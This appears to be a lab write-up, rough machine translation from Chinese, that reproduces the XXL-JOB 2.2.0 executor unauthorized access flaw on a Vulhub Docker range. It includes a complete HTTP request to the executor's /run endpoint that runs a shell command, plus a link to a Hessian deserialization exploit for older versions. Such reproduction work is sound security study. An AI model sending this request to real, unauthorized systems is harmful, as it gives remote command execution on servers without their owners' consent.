当前位置:网站首页>Vulhub vulnerability recurrence 76_ XXL-JOB
Vulhub vulnerability recurrence 76_ XXL-JOB
2022-07-04 06:56:00 【Revenge_ scan】
XXL-JOB executor Unauthorized access vulnerability
Vulnerability Details
XXL-JOB Is a distributed task scheduling platform , Its core design goal is rapid development 、 Learn easy 、 Lightweight 、 Easy to expand . Now open source and access to a number of companies online product lines , Open the box .XXL-JOB It is divided into admin and executor Both ends , The former is the background management page , The latter is the client of task execution .executor Authentication is not configured by default , An unauthorized attacker can pass through RESTful API Execute arbitrary orders .
Reference link :
- https://mp.weixin.qq.com/s/jzXIVrEl0vbjZxI4xlUm-g
- https://landgrey.me/blog/18/
- https://github.com/OneSourceCat/XxlJob-Hessian-RCE
Environment building
shooting range :192.168.4.10_ubuntu
Execute the following command to start 2.2.0 Version of XXL-JOB:
#docker-compose up -d
After the environment starts , visit `http://your-ip:8080` You can view the management side (admin), visit `http://your-ip:9999` Can view the client (executor).

Loophole recurrence
Directly to the client (executor) Send the following packets , You can execute the command :
```
POST /run HTTP/1.1
Host: your-ip:9999
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 365
{
"jobId": 1,
"executorHandler": "demoJobHandler",
"executorParams": "demoJobHandler",
"executorBlockStrategy": "COVER_EARLY",
"executorTimeout": 0,
"logId": 1,
"logDateTime": 1586629003729,
"glueType": "GLUE_SHELL",
"glueSource": "touch /tmp/success",
"glueUpdatetime": 1586699003758,
"broadcastIndex": 0,
"broadcastTotal": 0
}
```

`touch /tmp/success` Has been successfully executed :
in addition , lower than 2.2.0 Version of XXL-JOB No, RESTful API, We can go through [Hessian Deserialization ](https://github.com/OneSourceCat/XxlJob-Hessian-RCE) To execute an order .
边栏推荐
- Software keywords and process information intercepted by Golden Shield video player
- Uniapp applet subcontracting
- 【GF(q)+LDPC】基于二值图GF(q)域的规则LDPC编译码设计与matlab仿真
- [GF (q) + LDPC] regular LDPC coding and decoding design and MATLAB simulation based on the GF (q) field of binary graph
- Mysql 45讲学习笔记(十一)字符串字段怎么加索引
- [Valentine's day] - you can change your love and write down your lover's name
- The sorting in C language realizes the number sorting method from small to large
- uniapp 自定义环境变量
- What is the use of cloud redis? How to use cloud redis?
- Analysis of tars source code 5
猜你喜欢

校园网络问题

leetcode 310. Minimum Height Trees

What is industrial computer encryption and how to do it

响应式移动Web测试题

Deep profile data leakage prevention scheme

Knowledge payment applet dream vending machine V2

Google Chrome Portable Google Chrome browser portable version official website download method

The final week, I split

Variables d'environnement personnalisées uniapp

What is the use of cloud redis? How to use cloud redis?
随机推荐
Google Chrome Portable Google Chrome browser portable version official website download method
2022 Xinjiang's latest eight members (Safety Officer) simulated examination questions and answers
【问题记录】03 连接MySQL数据库提示:1040 Too many connections
11. Dimitt's law
Selection (021) - what is the output of the following code?
移动适配:vw/vh
Cervical vertebra, beriberi
图的底部问题
[GF (q) + LDPC] regular LDPC coding and decoding design and MATLAB simulation based on the GF (q) field of binary graph
颈椎、脚气
校园网络问题
Mysql 45讲学习笔记(十)force index
2022 wechat enterprise mailbox login entry introduction, how to open and register enterprise wechat enterprise mailbox?
Su Weijie, a member of Qingyuan Association and an assistant professor at the University of Pennsylvania, won the first Siam Youth Award for data science, focusing on privacy data protection, etc
The cloud native programming challenge ended, and Alibaba cloud launched the first white paper on application liveliness technology in the field of cloud native
Set JTAG fuc invalid to normal IO port
Tar source code analysis Part 3
Selenium ide plug-in download, installation and use tutorial
tars源码分析之10
Download kicad on Alibaba cloud image station